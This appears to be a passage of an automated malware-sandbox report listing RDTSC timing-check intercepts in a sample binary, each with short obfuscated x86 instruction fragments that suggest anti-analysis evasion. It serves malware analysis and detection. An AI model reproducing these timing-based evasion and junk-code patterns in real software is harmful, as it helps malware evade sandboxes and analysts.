Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B34F95 second address: B34FAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FDFF8F79156h 0x0000000a jmp 00007FDFF8F79160h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B35114 second address: B35118 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B35118 second address: B3511E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B3511E second address: B35124 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B35124 second address: B35130 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B376D9 second address: B376FE instructions: 0x00000000 rdtsc 0x00000002 jne 00007FDFF9160A2Eh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FDFF9160A30h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B376FE second address: B37713 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDFF8F7915Bh 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B37713 second address: B3771D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FDFF9160A26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B3771D second address: B37721 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AAA3D9 second address: AAA3EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FDFF9160A26h 0x0000000a push eax 0x0000000b pop eax 0x0000000c push edi 0x0000000d pop edi 0x0000000e popad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AAA3EB second address: AAA403 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007FDFF8F7915Fh 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AAA403 second address: AAA409 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AAA409 second address: AAA40F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AAA40F second address: AAA413 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B37468 second address: B37472 instructions: 0x00000000 rdtsc 0x00000002 js 00007FDFF8F7915Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B3C7C7 second address: B3C7D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push edx 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B3C7D0 second address: B3C7D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B3CAB0 second address: B3CAB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B3CAB6 second address: B3CACC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FDFF8F7915Fh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B3CC61 second address: B3CC7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007FDFF9160A30h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B3CDD5 second address: B3CDDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AEA2B6 second address: AEA2BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AEA2BA second address: AEA2C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AEA2C0 second address: AEA2C5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AEA2C5 second address: AEA369 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a jnp 00007FDFF8F7915Ch 0x00000010 mov dword ptr [ebp+12469D8Dh], esi 0x00000016 mov ebx, dword ptr [ebp+1247D250h] 0x0000001c mov dword ptr [ebp+122D1997h], esi 0x00000022 add eax, ebx 0x00000024 sbb cx, E4C1h 0x00000029 nop 0x0000002a jmp 00007FDFF8F79161h 0x0000002f push eax 0x00000030 pushad 0x00000031 jl 00007FDFF8F7916Bh 0x00000037 jmp 00007FDFF8F79165h 0x0000003c pushad 0x0000003d jmp 00007FDFF8F79166h 0x00000042 jl 00007FDFF8F79156h 0x00000048 popad 0x00000049 popad 0x0000004a nop 0x0000004b or dword ptr [ebp+12471D0Eh], edi 0x00000051 push 00000004h 0x00000053 mov dword ptr [ebp+122D2129h], ebx 0x00000059 nop 0x0000005a jmp 00007FDFF8F79166h 0x0000005f push eax 0x00000060 push eax 0x00000061 push edx 0x00000062 push esi 0x00000063 pushad 0x00000064 popad 0x00000065 pop esi 0x00000066 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B3CF01 second address: B3CF0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FDFF9160A26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B3D092 second address: B3D0A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 jmp 00007FDFF8F7915Bh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B3DA7F second address: B3DA89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FDFF9160A26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B3DA89 second address: B3DAA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FDFF8F7915Bh 0x0000000e jmp 00007FDFF8F7915Bh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B4292D second address: B42941 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jbe 00007FDFF9160A26h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jl 00007FDFF9160A42h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B42941 second address: B4295B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDFF8F79166h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B41CF4 second address: B41CF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B41F48 second address: B41F6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FDFF8F79156h 0x0000000a jmp 00007FDFF8F7915Bh 0x0000000f popad 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 jmp 00007FDFF8F7915Ah 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B41F6F second address: B41F74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B41F74 second address: B41F8F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jl 00007FDFF8F79156h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FDFF8F7915Ch 0x00000014 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B41F8F second address: B41F9D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnl 00007FDFF9160A26h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B420D6 second address: B420DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B420DC second address: B420E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B420E2 second address: B420E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B45448 second address: B4544E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B4D038 second address: B4D03C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B4D03C second address: B4D065 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007FDFF9160A39h 0x0000000c pushad 0x0000000d jbe 00007FDFF9160A26h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B4AF5D second address: B4AF8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FDFF8F7915Fh 0x0000000b popad 0x0000000c ja 00007FDFF8F79169h 0x00000012 jmp 00007FDFF8F7915Dh 0x00000017 jnl 00007FDFF8F79156h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B4AF8C second address: B4AF93 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B4AF93 second address: B4AF99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B4AF99 second address: B4AFA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007FDFF9160A26h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B4AFA8 second address: B4AFAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B4AFAC second address: B4AFB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B4B4FB second address: B4B507 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FDFF8F79156h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B4B804 second address: B4B808 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B4B808 second address: B4B81A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jbe 00007FDFF8F79156h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B4B81A second address: B4B81E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B4B81E second address: B4B838 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDFF8F79160h 0x00000007 je 00007FDFF8F79156h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B4BB4C second address: B4BB52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B4BB52 second address: B4BB56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B4BE75 second address: B4BE8D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDFF9160A34h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B4BE8D second address: B4BE99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B4BE99 second address: B4BE9F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B4BE9F second address: B4BEA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B4BEA7 second address: B4BEAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B4C13F second address: B4C143 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B4C143 second address: B4C149 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B4CD4F second address: B4CD63 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDFF8F7915Fh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B52F9E second address: B52FA9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007FDFF9160A26h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B52FA9 second address: B52FE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FDFF8F7915Eh 0x0000000f jmp 00007FDFF8F79161h 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FDFF8F7915Dh 0x0000001f rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B5249F second address: B524BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDFF9160A32h 0x00000007 ja 00007FDFF9160A2Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B5F5E1 second address: B5F615 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDFF8F7915Eh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jo 00007FDFF8F79156h 0x00000012 jmp 00007FDFF8F79169h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B5F615 second address: B5F619 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B5F619 second address: B5F621 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B5F621 second address: B5F62C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push edx 0x00000006 pop edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B5F873 second address: B5F88F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDFF8F79165h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B5F88F second address: B5F89E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jl 00007FDFF9160A2Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B5F9FE second address: B5FA18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FDFF8F79156h 0x0000000a jmp 00007FDFF8F79160h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B5FA18 second address: B5FA1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B5FA1C second address: B5FA22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B5FB82 second address: B5FB88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B5FE7F second address: B5FE83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B6077A second address: B607A7 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FDFF9160A26h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FDFF9160A2Eh 0x00000015 jmp 00007FDFF9160A2Fh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B607A7 second address: B607D6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jo 00007FDFF8F79156h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FDFF8F79164h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FDFF8F7915Dh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B60F0F second address: B60F13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B60F13 second address: B60F21 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FDFF8F79156h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B60F21 second address: B60F2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FDFF9160A26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B60F2B second address: B60F46 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDFF8F79167h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B68034 second address: B68042 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FDFF9160A26h 0x0000000a pop edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B67BFE second address: B67C13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FDFF8F79156h 0x0000000a jng 00007FDFF8F79156h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B67C13 second address: B67C19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B67C19 second address: B67C31 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDFF8F79164h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B67D6C second address: B67D86 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDFF9160A36h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B74197 second address: B741A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007FDFF8F79156h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B741A4 second address: B741C2 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FDFF9160A26h 0x00000008 jnc 00007FDFF9160A26h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push esi 0x00000012 pop esi 0x00000013 push edi 0x00000014 pop edi 0x00000015 popad 0x00000016 popad 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B741C2 second address: B741C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B741C6 second address: B741E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDFF9160A36h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B741E6 second address: B741EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B73D3E second address: B73D50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FDFF9160A26h 0x0000000a jng 00007FDFF9160A26h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B73D50 second address: B73D65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FDFF8F79160h 0x0000000a rdtsc
